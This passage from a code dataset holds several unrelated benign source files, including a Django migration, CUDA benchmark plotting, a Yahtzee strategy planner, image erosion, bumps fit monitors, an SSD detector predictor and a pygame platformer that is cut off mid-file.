'Secreta')])),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ],\n options={\n 'verbose_name': 'Mat\\xe9ria da Ordem do Dia',\n 'verbose_name_plural': 'Mat\\xe9rias da Ordem do Dia',\n },\n ),\n migrations.CreateModel(\n name='PresencaOrdemDia',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_ordem', models.DateField()),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ],\n options={\n 'verbose_name': 'Presen\\xe7a da Ordem do Dia',\n 'verbose_name_plural': 'Presen\\xe7as da Ordem do Dia',\n },\n ),\n migrations.CreateModel(\n name='RegistroVotacao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('numero_votos_sim', models.IntegerField(verbose_name='Sim')),\n ('numero_votos_nao', models.IntegerField(verbose_name='N\\xe3o')),\n ('numero_abstencoes', models.IntegerField(verbose_name='Absten\\xe7\\xf5es')),\n ('observacao', models.TextField(null=True, verbose_name='Observa\\xe7\\xf5es', blank=True)),\n ('materia', models.ForeignKey(to='materia.MateriaLegislativa')),\n ('ordem', models.ForeignKey(to='sessao.OrdemDia')),\n ],\n options={\n 'verbose_name': 'Vota\\xe7\\xe3o',\n 'verbose_name_plural': 'Vota\\xe7\\xf5es',\n },\n ),\n migrations.CreateModel(\n name='SessaoPlenaria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('cod_andamento_sessao', models.IntegerField(null=True, blank=True)),\n ('tipo_expediente', models.CharField(max_length=10)),\n ('data_inicio', models.DateField(verbose_name='Abertura')),\n ('dia', models.CharField(max_length=15)),\n ('hora_inicio', models.CharField(max_length=5, verbose_name='Hor\\xe1rio')),\n ('hora_fim', models.CharField(max_length=5, null=True, verbose_name='Hor\\xe1rio', blank=True)),\n ('numero', models.IntegerField(verbose_name='N\\xfamero')),\n ('data_fim', models.DateField(null=True, verbose_name='Encerramento', blank=True)),\n ('url_audio', models.CharField(max_length=150, null=True, verbose_name='URL Arquivo \\xc1udio (Formatos MP3 / AAC)', blank=True)),\n ('url_video', models.CharField(max_length=150, null=True, verbose_name='URL Arquivo V\\xeddeo (Formatos MP4 / FLV / WebM)', blank=True)),\n ('legislatura', models.ForeignKey(verbose_name='Legislatura', to='parlamentares.Legislatura')),\n ('sessao_legislativa', models.ForeignKey(verbose_name='Sess\\xe3o Legislativa', to='parlamentares.SessaoLegislativa')),\n ],\n options={\n 'verbose_name': 'Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Sess\\xf5es Plen\\xe1rias',\n },\n ),\n migrations.CreateModel(\n name='SessaoPlenariaPresenca',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('data_sessao', models.DateField(null=True, blank=True)),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ('sessao_plen', models.ForeignKey(to='sessao.SessaoPlenaria')),\n ],\n options={\n 'verbose_name': 'Presen\\xe7a em Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Presen\\xe7as em Sess\\xf5es Plen\\xe1rias',\n },\n ),\n migrations.CreateModel(\n name='TipoExpediente',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome', models.CharField(max_length=100, verbose_name='Tipo')),\n ],\n options={\n 'verbose_name': 'Tipo de Expediente',\n 'verbose_name_plural': 'Tipos de Expediente',\n },\n ),\n migrations.CreateModel(\n name='TipoResultadoVotacao',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome', models.CharField(max_length=100, verbose_name='Tipo')),\n ],\n options={\n 'verbose_name': 'Tipo de Resultado de Vota\\xe7\\xe3o',\n 'verbose_name_plural': 'Tipos de Resultado de Vota\\xe7\\xe3o',\n },\n ),\n migrations.CreateModel(\n name='TipoSessaoPlenaria',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome', models.CharField(max_length=30, verbose_name='Tipo')),\n ('quorum_minimo', models.IntegerField(verbose_name='Qu\\xf3rum m\\xednimo')),\n ],\n options={\n 'verbose_name': 'Tipo de Sess\\xe3o Plen\\xe1ria',\n 'verbose_name_plural': 'Tipos de Sess\\xe3o Plen\\xe1ria',\n },\n ),\n migrations.CreateModel(\n name='VotoParlamentar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('voto', models.CharField(max_length=10)),\n ('parlamentar', models.ForeignKey(to='parlamentares.Parlamentar')),\n ('votacao', models.ForeignKey(to='sessao.RegistroVotacao')),\n ],\n options={\n 'verbose_name': 'Registro de Vota\\xe7\\xe3o de Parlamentar',\n 'verbose_name_plural': 'Registros de Vota\\xe7\\xf5es de Parlamentares',\n },\n ),\n migrations.AddField(\n model_name='sessaoplenaria',\n name='tipo',\n field=models.ForeignKey(verbose_name='Tipo', to='sessao.TipoSessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='registrovotacao',\n name='tipo_resultado_votacao',\n field=models.ForeignKey(verbose_name='Resultado da Vota\\xe7\\xe3o', to='sessao.TipoResultadoVotacao'),\n ),\n migrations.AddField(\n model_name='presencaordemdia',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='ordemdia',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='oradorexpediente',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='orador',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='integrantemesa',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='expedientesessao',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n migrations.AddField(\n model_name='expedientesessao',\n name='tipo',\n field=models.ForeignKey(to='sessao.TipoExpediente'),\n ),\n migrations.AddField(\n model_name='expedientemateria',\n name='sessao_plenaria',\n field=models.ForeignKey(to='sessao.SessaoPlenaria'),\n ),\n ]\n","sub_path":"sessao/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":12521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"75816519","text":"from matplotlib import pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nfrom ExecuteBenchmarks import GetDRAMThroughput\nimport jinja2\nimport os\nfrom jinja2 import Template\nlatex_jinja_env = jinja2.Environment(\n\tblock_start_string = '\\BLOCK{',\n\tblock_end_string = '}',\n\tvariable_start_string = '\\VAR{',\n\tvariable_end_string = '}',\n\tcomment_start_string = '\\#{',\n\tcomment_end_string = '}',\n\tline_statement_prefix = '%%',\n\tline_comment_prefix = '%#',\n\ttrim_blocks = True,\n\tautoescape = False,\n\tloader = jinja2.FileSystemLoader(os.path.abspath('.'))\n)\n\n# GeForce 750 Ti\nMAX_GFLOPS = 1398\nMAX_BANDWIDTH = 86.4\n\nsystemName = \"750Ti Srv.\"\n\ndef GeneratePlot(results, job_title, output_dir = '.'):\n print(\"Processing Data...\")\n # Generate graph\n ind = []\n\n columns = {}\n\n for result in results:\n for testName in result['times']:\n time_data = result['times'][testName]\n if testName not in columns:\n columns[testName] = {}\n\n imageNumber = int(result['image'][5:7])\n if imageNumber not in columns[testName]:\n columns[testName][imageNumber] = {}\n\n columns[testName][imageNumber]['total-seq-time'] = time_data['seq']['total_time']/1e6; # ms\n columns[testName][imageNumber]['total-cuda-time'] = time_data['cuda']['total_time']/1e6; # ms\n columns[testName][imageNumber]['total-speedup'] = time_data['seq']['total_time']/time_data['cuda']['total_time'];\n\n columns[testName][imageNumber]['kernel-seq-time'] = time_data['seq']['kernel_time']/1e6; # ms\n columns[testName][imageNumber]['kernel-cuda-time'] = time_data['cuda']['kernel_time']/1e3; # us\n columns[testName][imageNumber]['kernel-speedup'] = time_data['seq']['kernel_time']/time_data['cuda']['kernel_time'];\n\n #print(\"{0:e} GFLOPS\".format(int(result['prof'][testName]['flop_count_sp']['max'])/1e9))\n #print(\"{0:e} seconds\".format(time['cuda']['kernel_time']/1e9))\n #print(\"{0:f} GFLOPS/s\".format((int(result['prof'][testName]['flop_count_sp']['max'])/1e9)/(time['cuda']['kernel_time']/1e9)))\n\n columns[testName][imageNumber]['theoretical-gflops'] = MAX_GFLOPS;\n columns[testName][imageNumber]['theoretical-bandwidth'] = MAX_BANDWIDTH;\n\n columns[testName][imageNumber]['total-mflops'] = (int(result['prof'][testName]['flop_count_sp']['max'])/1e6); # MFLOPS\n #columns[testName][imageNumber]['attained-gflops'] = (int(result['prof'][testName]['flop_count_sp']['max'])/1e9)/(time_data['cuda']['kernel_time']/1e9); # GFLOPS/s\n columns[testName][imageNumber]['reported-sp-efficiency'] = float(result['prof'][testName]['flop_sp_efficiency']['max'][:-1])\n columns[testName][imageNumber]['attained-gflops'] = MAX_GFLOPS*columns[testName][imageNumber]['reported-sp-efficiency']/100; # GFLOPS/s\n columns[testName][imageNumber]['attained-bandwidth'] = GetDRAMThroughput(result['prof'][testName],'max'); # GB/s\n\n columns[testName][imageNumber]['reported-sm-efficiency'] = float(result['prof'][testName]['sm_efficiency']['max'][:-1])\n columns[testName][imageNumber]['attained-iops'] = (int(result['prof'][testName]['inst_integer']['max'][:-1])/2e9)/(time_data['cuda']['kernel_time']/1e9); # GIOPS/s (2 because documentation says so)\n\n template = latex_jinja_env.get_template('table.tex')\n print(\"Writing Latex Tables...\")\n for testName in columns:\n table_latex = template.render(systemName=systemName,test=columns[testName],testName=testName,testNameLower=testName.lower())\n resources_dir = os.path.join(output_dir,testName.lower(),'resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n with open(os.path.join(resources_dir,'perf-table{0}.tex'.format(job_title)),'w') as file:\n file.write(table_latex)\n\n print(\"Generating Plot...\")\n xlabel = \"Kernel\"\n ylabel = \"Speedup\"\n title = \"Total CUDA Speedup\"\n style.use('bmh')\n\n ind = np.arange(4)\n width = 0.25\n\n\n figure, ax = plt.subplots()\n legend_items = []\n rects = []\n xticklabels = []\n prop_iter = iter(plt.rcParams['axes.prop_cycle'])\n i=0\n for result in results:\n imageNumber = int(result['image'][5:7])\n values = []\n for testName in result['times']:\n values.append(columns[testName][imageNumber]['total-speedup'])\n if testName not in xticklabels:\n xticklabels.append(testName)\n legend_items.append(result['image'])\n rects.append(ax.bar(ind+width*i, values, width, color=next(prop_iter)['color']))\n i += 1\n\n ax.legend(rects, legend_items)\n\n ax.set_xticklabels(xticklabels)\n ax.set_xticks(ind + width*i/2)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n ax.set_yscale(\"log\", nonposy='clip')\n ax.set_title(title)\n\n plt.grid(True)\n\n print(\"Saving Plot...\")\n resources_dir = os.path.join(output_dir,'conclusion','resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n figure.savefig(os.path.join(resources_dir,\"{0}-{1}.pdf\".format(\"total-cuda-speedup\",job_title)),format='pdf',transparent=True)\n\n print(\"Generating Plot...\")\n xlabel = \"Kernel\"\n ylabel = \"Speedup\"\n title = \"Kernel CUDA Speedup\"\n style.use('bmh')\n\n ind = np.arange(4)\n width = 0.25\n\n\n figure, ax = plt.subplots()\n legend_items = []\n rects = []\n xticklabels = []\n prop_iter = iter(plt.rcParams['axes.prop_cycle'])\n i=0\n for result in results:\n imageNumber = int(result['image'][5:7])\n values = []\n for testName in result['times']:\n values.append(columns[testName][imageNumber]['kernel-speedup'])\n if testName not in xticklabels:\n xticklabels.append(testName)\n legend_items.append(result['image'])\n rects.append(ax.bar(ind+width*i, values, width, color=next(prop_iter)['color']))\n i += 1\n\n ax.legend(rects, legend_items)\n\n ax.set_xticklabels(xticklabels)\n ax.set_xticks(ind + width*i/2)\n ax.set_ylabel(ylabel)\n ax.set_xlabel(xlabel)\n ax.set_yscale(\"log\", nonposy='clip')\n ax.set_title(title)\n\n plt.grid(True)\n\n print(\"Saving Plot...\")\n resources_dir = os.path.join(output_dir,'conclusion','resources')\n if not os.path.exists(resources_dir):\n os.makedirs(resources_dir)\n figure.savefig(os.path.join(resources_dir,\"{0}-{1}.pdf\".format(\"kernel-cuda-speedup\",job_title)),format='pdf',transparent=True)","sub_path":"src/Lab 3/Wrapper/GeneratePlots.py","file_name":"GeneratePlots.py","file_ext":"py","file_size_in_byte":6580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"99804470","text":"from MakeOrderScreen import *\nfrom PayBillScreen import *\nfrom UpdateDetailsScreen import *\n\ndef customerScreen(customer):\n ans = \"ON\"\n while ans:\n print(\"\"\"\n Welcome back, \"\"\" + customer.getFirstName() + \"\"\"\n 1.Make an order\n 2.Pay your bill\n 3.Update your details\n 4.Back\n \"\"\")\n #stores the users input\n ans = input(\"What would you like to do? \")\n \n if(ans == \"1\"):\n #loads the make order screen method and passes in the customer\n makeOrderScreen(customer)\n elif(ans == \"2\"):\n #loads the pay bill screen method and passes in the customer\n payBillScreen(customer)\n elif(ans == \"3\"):\n #loads the update details screen method and passes in the customer\n updateDetailsScreen(customer)\n elif(ans == \"4\"):\n #stops the while loop which loads the previous screen method\n ans = None\n","sub_path":"CustomerScreen.py","file_name":"CustomerScreen.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"277801842","text":"# -*- coding: utf8 -*-\n\nfrom resources import FileResource\nfrom processors import *\nfrom process import Process\nfrom tuttle.extensions.ext_csv import CSV2SQLiteProcessor\nfrom tuttle.extensions.net import DownloadProcessor, HTTPResource\nfrom tuttle.extensions.sqlite import SQLiteProcessor, SQLiteResource\nimport os\n\nclass WorkflowBuilder():\n \"\"\"A helper class to build Process classes from the name of processors and resources\"\"\"\n \n def __init__(self):\n self._resources_definition = {}\n self._processors = {}\n self.init_resources_and_processors()\n\n def init_resources_and_processors(self):\n self._resources_definition['file'] = FileResource\n self._resources_definition['http'] = HTTPResource\n self._resources_definition['sqlite'] = SQLiteResource\n self._processors['shell'] = ShellProcessor()\n self._processors['bat'] = BatProcessor()\n self._processors['download'] = DownloadProcessor()\n self._processors['sqlite'] = SQLiteProcessor()\n self._processors['csv2sqlite'] = CSV2SQLiteProcessor()\n if os.name ==\"nt\":\n self._processors['default'] = self._processors['bat']\n else:\n self._processors['default'] = self._processors['shell']\n\n def extract_scheme(self, url):\n \"\"\"Extract the scheme from an url\n url is supposed to be stripped from spaces\n \"\"\"\n separator_pos = url.find('://')\n if separator_pos == -1:\n return False\n url_scheme = url[:separator_pos]\n return url_scheme\n\n def build_resource(self, url):\n scheme = self.extract_scheme(url)\n if scheme is False or scheme not in self._resources_definition:\n return None\n ResDefClass = self._resources_definition[scheme]\n return ResDefClass(url)\n \n def build_process(self, processor, file_name, line_num):\n if processor in self._processors:\n return Process(self._processors[processor], file_name, line_num)\n else:\n return False\n\n def get_or_build_resource(self, url, resources):\n if url not in resources:\n resource = self.build_resource(url)\n resources[url] = resource\n else:\n resource = resources[url]\n return resource\n","sub_path":"tuttle/workflow_builder.py","file_name":"workflow_builder.py","file_ext":"py","file_size_in_byte":2296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"593080842","text":"from mpl_toolkits.mplot3d import Axes3D\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef graf3D(tab) :\n Nx,Ny=np.shape(tab)\n \n fig = plt.figure()\n ax = fig.gca(projection='3d')\n X = np.arange(0, Nx, 1)\n Y = np.arange(0, Ny, 1)\n X, Y = np.meshgrid(X, Y)\n Z = tab\n surf = ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=cm.coolwarm,\n linewidth=0, antialiased=False)\n ax.set_zlim(-1.01, 1.01)\n \n ax.zaxis.set_major_locator(LinearLocator(10))\n ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\n \n fig.colorbar(surf, shrink=0.5, aspect=5)\n \n plt.show()","sub_path":"hgraphiques.py","file_name":"hgraphiques.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"256881824","text":"\"\"\"\nLast Roll Strategy Planner for Simplified Yahtzee\nSimplifications: only allow discard and roll, only score against upper level\n\"\"\"\n\n# Used to increase the timeout, if necessary\n# import codeskulptor\n# codeskulptor.set_timeout(20)\n\n\ndef gen_all_sequences(outcomes, length):\n \"\"\"\n Iterative function that enumerates the set of all sequences of\n outcomes of given length.\n \"\"\"\n # Function created by instructors. Leave it alone.\n answer_set = set([()])\n for dummy_idx in range(length):\n temp_set = set()\n for partial_sequence in answer_set:\n for item in outcomes:\n new_sequence = list(partial_sequence)\n new_sequence.append(item)\n temp_set.add(tuple(new_sequence))\n answer_set = temp_set\n return answer_set\n\n\ndef score(hand):\n \"\"\"\n Compute the maximal score for a Yahtzee hand according to the\n upper section of the Yahtzee score card.\n\n hand: full yahtzee hand\n\n Returns an integer score\n \"\"\"\n scores = []\n for die_value in set(hand):\n occurances = hand.count(die_value)\n scores.append(occurances * die_value)\n return max(scores)\n\n\ndef expected_value(held_dice, num_die_sides, num_free_dice):\n \"\"\"\n Compute the expected value based on held_dice given that there\n are num_free_dice to be rolled, each with num_die_sides.\n\n held_dice: dice that you will hold\n num_die_sides: number of sides on each die\n num_free_dice: number of dice to be rolled\n\n Returns a floating point expected value\n \"\"\"\n sides_of_die = set(range(1, num_die_sides + 1))\n possible_rolls = gen_all_sequences(sides_of_die, num_free_dice)\n resulting_hands = []\n expected_score = 0\n for roll in possible_rolls:\n hand = sorted(held_dice + roll)\n resulting_hands.append(hand)\n for hand in resulting_hands:\n expected_score += score(hand) / float(len(resulting_hands))\n return expected_score\n\n\ndef gen_all_holds(hand):\n \"\"\"\n Generate all possible choices of dice from hand to hold.\n\n hand: full yahtzee hand\n\n Returns a set of tuples, where each tuple is dice to hold\n \"\"\"\n possible_holds = set([()])\n for die in hand:\n temporary_set = set()\n for subset in possible_holds:\n new_subset = list(subset) + [die]\n new_subset = tuple(new_subset)\n temporary_set.add(new_subset)\n possible_holds.update(temporary_set)\n return possible_holds\n\n\ndef strategy(hand, num_die_sides):\n \"\"\"\n Compute the hold that maximizes the expected value when the\n discarded dice are rolled.\n\n hand: full yahtzee hand\n num_die_sides: number of sides on each die\n\n Returns a tuple where the first element is the expected score and\n the second element is a tuple of the dice to hold\n \"\"\"\n possible_holds = gen_all_holds(hand)\n scored_hands = []\n for held_dice in possible_holds:\n num_free_dice = len(hand) - len(held_dice)\n expected_score = expected_value(held_dice, num_die_sides, num_free_dice)\n scored_hand = (expected_score, held_dice)\n scored_hands.append(scored_hand)\n scored_hands.sort()\n return scored_hands[-1]\n\n\ndef run_example():\n \"\"\"\n Compute the dice to hold and expected score for an example hand\n \"\"\"\n num_die_sides = 6\n hand = (1, 1, 1, 5, 6)\n hand_score, hold = strategy(hand, num_die_sides)\n print(\"Best strategy for hand\", hand, \"is to hold\", hold,\n \"with expected score\", hand_score)\n\n# run_example()\n","sub_path":"strategy_planner.py","file_name":"strategy_planner.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"181813191","text":"#!/usr/local/bin/python3.5\nimport sys\nfrom PIL import Image\n\ninfilename = sys.argv[1]\noutfilename = sys.argv[2]\n\nin_img = Image.open(infilename)\nout_img = Image.new('L', in_img.size)\n\n# define basic settings\nwidth, height = in_img.size\nBLACK = 0\nWHITE = 255\n\nmask_2d = [\\\n (-1,-2),(0,-2),(1,-2),\\\n (-2,-1),(-1,-1),(0,-1),(1,-1),(2,-1),\\\n (-2,0),(-1,0),(0,0),(1,0),(2,0),\\\n (-2,1),(-1,1),(0,1),(1,1),(2,1),\\\n (-1,2),(0,2),(1,2)\\\n]\n\n# get 1D image data\ndata_seq = list(in_img.getdata())\nout_data = [0] * len(data_seq)\n\nfor y in range(height):\n for x in range(width):\n if data_seq[y * width + x] == WHITE:\n for m in mask_2d:\n p = (x + m[0], y + m[1])\n if p[0] < 0 or p[0] >= width or p[1] < 0 or p[1] >= height:\n break\n elif data_seq[p[1] * width + p[0]] != WHITE:\n break\n else:\n out_data[y * width + x] = WHITE\n\n# save output image\nout_img.putdata(out_data)\nout_img.save(outfilename, 'bmp')\n","sub_path":"hw4/erosion.py","file_name":"erosion.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"317453195","text":"import torch\n\nfrom .. import utils as box_utils\nfrom ..misc import Timer\n\nfrom torch.nn import functional as F\n\n\nclass Predictor:\n def __init__(self, net, priors, nms_method=None, center_variance=0.1, size_variance=0.2,\n nms_threshold=0.45, filter_threshold=0.01, candidate_size=200, sigma=0.5):\n self.net = net\n self.nms_threshold = nms_threshold\n self.filter_threshold = filter_threshold\n self.candidate_size = candidate_size\n self.nms_method = nms_method\n self.priors = priors\n self.center_variance = center_variance\n self.size_variance = size_variance\n\n self.sigma = sigma\n\n self.timer = Timer()\n\n def predict(self, image, top_k=-1, prob_threshold=None, verbose=False, return_outputs=False):\n cpu_device = torch.device(\"cpu\")\n _, height, width = image.shape\n images = image.unsqueeze(0)\n with torch.no_grad():\n self.timer.start()\n outs = self.net.forward(images)\n confidences, locations = outs[:2]\n #print('TYPE')\n #print(locations.is_cuda)\n scores = F.softmax(confidences, dim=2)\n boxes = box_utils.convert_locations_to_boxes(locations, self.priors, self.center_variance, self.size_variance)\n boxes = box_utils.center_form_to_corner_form(boxes)\n del locations\n if verbose:\n print(\"Inference time: \", self.timer.end())\n boxes = boxes[0]\n scores = scores[0]\n if not prob_threshold:\n prob_threshold = self.filter_threshold\n # this version of nms is slower on GPU, so we move data to CPU.\n boxes = boxes.to(cpu_device)\n scores = scores.to(cpu_device)\n picked_box_probs = []\n picked_labels = []\n for class_index in range(1, scores.size(1)):\n probs = scores[:, class_index]\n mask = probs > prob_threshold\n probs = probs[mask]\n if probs.size(0) == 0:\n continue\n subset_boxes = boxes[mask, :]\n box_probs = torch.cat([subset_boxes, probs.reshape(-1, 1)], dim=1)\n box_probs = box_utils.nms(box_probs, self.nms_method,\n score_threshold=prob_threshold,\n nms_threshold=self.nms_threshold,\n sigma=self.sigma,\n top_k=top_k,\n candidate_size=self.candidate_size)\n picked_box_probs.append(box_probs)\n picked_labels.extend([class_index] * box_probs.size(0))\n if not picked_box_probs:\n return torch.tensor([]), torch.tensor([]), torch.tensor([])\n picked_box_probs = torch.cat(picked_box_probs)\n picked_box_probs[:, 0] *= width\n picked_box_probs[:, 1] *= height\n picked_box_probs[:, 2] *= width\n picked_box_probs[:, 3] *= height\n if return_outputs:\n return picked_box_probs[:, :4], torch.tensor(picked_labels), picked_box_probs[:, 4], outs\n else:\n return picked_box_probs[:, :4], torch.tensor(picked_labels), picked_box_probs[:, 4]\n","sub_path":"vision/tasks/detection/ssd_qfgaohao/ssd/predictor.py","file_name":"predictor.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"434873561","text":"import os\nfrom threading import Thread\nfrom copy import deepcopy\n\nfrom PyQt5.QtCore import pyqtSignal, QObject\n\nfrom bumps.dream.state import MCMCDraw\nfrom bumps.monitor import TimedUpdate, Monitor\nfrom bumps.fitproblem import BaseFitProblem\nimport numpy as np\n\nRATE = 1\n\nclass ConvergenceMonitor(Monitor, QObject):\n\t\"\"\"\n\tGather statistics about the best, worst, median and +/- 1 interquartile\n\trange. This will be the input for the convergence plot.\n\t\"\"\"\n\n\tFitProgressEvent = pyqtSignal(np.ndarray)\n\n\tdef __init__(self, problem, rate=RATE):\n\t\tQObject.__init__(self)\n\t\tself.time = 0\n\t\tself.rate = rate\n\t\tself.problem = problem\n\t\tself.pop = []\n\n\tdef config_history(self, history):\n\t\thistory.requires(population_values=1, value=1, time=1)\n\n\tdef __call__(self, history):\n\t\tbest = history.value[0]\n\t\ttry:\n\t\t\tpop = history.population_values[0]\n\t\t\tn = len(pop)\n\t\t\tp = np.sort(pop)\n\t\t\tQI, Qmid, = int(0.2 * n), int(0.5 * n)\n\t\t\tself.pop.append((best, p[0], p[QI], p[Qmid], p[-1 - QI], p[-1]))\n\t\texcept AttributeError:\n\t\t\tself.pop.append((best,))\n\n\t\tif history.time[0] >= self.time+self.rate:\n\t\t\tself.FitProgressEvent.emit(self.progress())\n\t\t\tself.time = history.time[0]\n\n\tdef progress(self):\n\t\tif not self.pop:\n\t\t\treturn None\n\t\telse:\n\t\t\treturn np.array(self.pop)\n\nclass DreamMonitor(Monitor, QObject):\n\n\tFitProgressEvent = pyqtSignal(BaseFitProblem, MCMCDraw)\n\n\tdef __init__(self, problem, rate=RATE):\n\t\tQObject.__init__(self)\n\t\tself.time = 0\n\t\tself.rate = rate\n\t\tself.problem = problem\n\t\tself.uncertainty_state = None\n\t\treturn\n\n\tdef config_history(self, history):\n\t\thistory.requires(time=1)\n\t\treturn\n\n\tdef __call__(self, history):\n\t\ttry:\n\t\t\tself.uncertainty_state = history.uncertainty_state\n\t\t\tif history.time[0] >= self.time+self.rate:\n\t\t\t\tself.FitProgressEvent.emit(self.problem, deepcopy(self.uncertainty_state))\n\t\t\t\tself.time = history.time[0]\n\t\texcept AttributeError:\n\t\t\tself.uncertainty_state = None\n\n\t\treturn\n\n\tdef final(self):\n\t\tif self.uncertainty_state:\n\t\t\tself.FitProgressEvent.emit(self.problem, deepcopy(self.uncertainty_state))\n\t\treturn\n\nclass QtProgressMonitor(TimedUpdate, QObject):\n\n\tFitProgressEvent = pyqtSignal(BaseFitProblem, str, float, float, np.ndarray)\n\n\tdef __init__(self, problem):\n\t\tQObject.__init__(self)\n\t\tTimedUpdate.__init__(self, progress=RATE, improvement=RATE)\n\t\tself.problem = problem\n\n\tdef show_progress(self, history):\n\t\t# self.FitProgressEvent.emit(problem=self.problem, message=\"progress\", step=history.step[0], value=history.value[0], point=history.point[0]+0)\n\t\tself.FitProgressEvent.emit(self.problem, \"progress\", history.step[0], history.value[0], history.point[0] + 0)\n\t\treturn\n\n\t# def show_improvement(self, history):\n\t# \tself.FitProgressEvent.emit(problem=self.problem, message=\"improvement\", step=history.step[0], value=history.value[0], point=history.point[0]+0)\n\t\t# self.FitProgressEvent.emit(self.problem, \"improvement\", history.step[0], history.value[0], history.point[0] + 0)\n\t\t# return","sub_path":"monitors.py","file_name":"monitors.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"412172246","text":"\"\"\"\n Pygame player\n\n\"\"\"\n\nimport pygame\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n\n # Initialize base class\n super(Player, self).__init__()\n\n width = 40\n height = 60\n\n self.image = pygame.Surface([width, height])\n self.image.fill(RED)\n\n self.rect = self.image.get_rect()\n\n self.change_x = 0\n self.change_y = 0\n\n self.level = None\n\n def update(self):\n self.calculate_gravity()\n\n self.rect.x += self.change_x\n\n if self.rect.x >= 500:\n pass\n\n hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for item in hit_list:\n if self.change_x > 0:\n self.rect.right = item.rect.left\n elif self.change_x < 0:\n self.rect.left = item.rect.right\n\n self.rect.y += self.change_y\n\n hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\n for item in hit_list:\n if self.change_y > 0:\n self.rect.bottom = item.rect.top\n elif self.change_y < 0:\n self.rect.top = item.rect.bottom\n\n self.change_y = 0\n\n def go_left(self):\n self.change_x = -6\n\n def go_right(self):\n self.change_x = 6\n\n def stop(self):\n self.change_x = 0\n\n def jump(self):\n self.change_y = -10\n\n def calculate_gravity(self):\n if self.change_y == 0:\n self.change_y = 1\n else:\n self.change_y += 0.35\n\n # On the ground?\n if self.rect.y >= SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\n self.change_y = 0\n self.rect.y = SCREEN_HEIGHT - self.rect.height\n\n\nclass Platform(pygame.sprite.Sprite):\n def __init__(self, width, height):\n # Initialize base class\n super(Platform, self).__init__()\n\n self.image = pygame.Surface([width, height])\n self.image.fill(GREEN)\n\n self.rect = self.image.get_rect()\n\n\nclass Level(object):\n def __init__(self):\n self.platform_list = pygame.sprite.Group()\n self.world_shift = 0\n\n def update(self):\n self.platform_list.update()\n\n def draw(self, screen):\n screen.fill(BLUE)\n self.platform_list.draw(screen)\n\n def shift_world(self, shift_x):\n self.world_shift += shift_x\n\n for item in self.platform_list:\n item.rect.x += shift_x\n\n\nclass Level01(Level):\n def __init__(self):\n\n Level.__init__(self)\n\n self.level_limit = -500\n\n # levels = [[210, 70, 500, 500],\n # [210, 70, 200, 400],\n # [210, 70, 600, 300]]\n\n levels = [[210, 70, 500, 500],\n [210, 70, 800, 400],\n [210, 70, 1000, 500],\n 